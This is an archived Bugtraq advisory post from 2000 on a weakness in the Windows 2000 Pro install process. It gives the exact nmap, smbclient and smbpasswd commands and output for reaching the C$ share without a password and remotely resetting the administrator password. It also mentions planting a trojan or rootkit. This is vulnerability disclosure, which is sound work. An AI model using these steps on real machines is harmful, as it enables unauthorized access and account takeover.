[13979] in bugtraq
Re: Windows 2000 installation process weakness
daemon@ATHENA.MIT.EDU (Stephane Aubert)
Wed Feb 23 12:39:38 2000
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-Id: <20000223145747.P4500@safe.hsc.fr>
Date: Wed, 23 Feb 2000 14:57:47 +0100
Reply-To: Stephane.Aubert@HSC.FR
From: Stephane Aubert <Stephane.Aubert@HSC.FR>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000215155750.M4500@safe.hsc.fr>
Hello,
As a lot of people asked me information on the unsecure win2k pro
installation process, we wish to bring further information on this
vulnerability.
All these tests have been made and checked with Denis Ducamp and
Alain Thivillon, 2 serious security experts.
What we have done :
1. Install the final release of win2k pro (build 2195)
2. Do not give any IP address during the install. If no DHCP server
is responding the win2k pro box take 169.254.153.13 as IP address.
(The address range used is 169.254.0.0/16, which is registered
with the IANA as the LINKLOCAL net.)
Notice : if a real IP address is given by the admin or a DCHP server
you can connect directely, and jump to step 4 right now.
3. On your favorit Linux (or *BSD) box add an alias to the interface :
# ifconfig eth0:0 169.254.153.11
4. Just after the configuration of COM+ by win2k you can ping or scan it :
% nmap 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
139 open tcp netbios-ssn
# nmap -sU -p 1-200 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
137 open udp netbios-ns
138 open udp netbios-dgm
Notice : the administrtor have already entered a password !!!
5. By now, you can connect via SMB (smbclient for example)
to the C$ or ADMIN$ share WITHOUT ANY PASSWORD !!!
This until win2k asked the admin to reboot the computer.
Notice : it's possible to use NAT (netbios auditing tool)
to obtain the netbios name of the windows box and the shares.
% ./smbclient //groar/c$ -I 169.254.153.13 -U administrator
added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224
Password: <EMPTY>
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \> ls
IO.SYS HSR 40992 Tue May 31 06:22:00 1994
MSDOS.SYS HSR 38166 Tue May 31 06:22:00 1994
COMMAND.COM R 56286 Tue May 31 06:22:00 1994
WINA20.386 A 9349 Tue May 31 06:22:00 1994
CONFIG.SYS A 638 Fri Feb 18 15:34:00 2000
AUTOEXEC.BAT A 690 Fri Feb 18 15:33:10 2000
6. Worse !
You can SET (remotly) a new administrator password :
% ./smbpasswd -U administrator -r groar
Old SMB password: <EMPTY>
New SMB password: <NEWPASS>
Retype new SMB password: <NEWPASS>
startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
unable to open smb password database.
Password changed for user administrator.
By now, nobody - even the administrator - even after the reboot - can
connect (remote nor local) without the NEW password.
The administrator have to crack his own computer ;-))
7. Worse !
It is also (evidence) possible to transfert a trojan on the new
computer or just a rootkit (www.rootkit.com) in order to keep
administrator privileges for a long time :(
Regards,
Stiphane
--
Stephane AUBERT -=- Herve Schauer Consultants
Stephane.Aubert@hsc.fr http://www.hsc.fr/
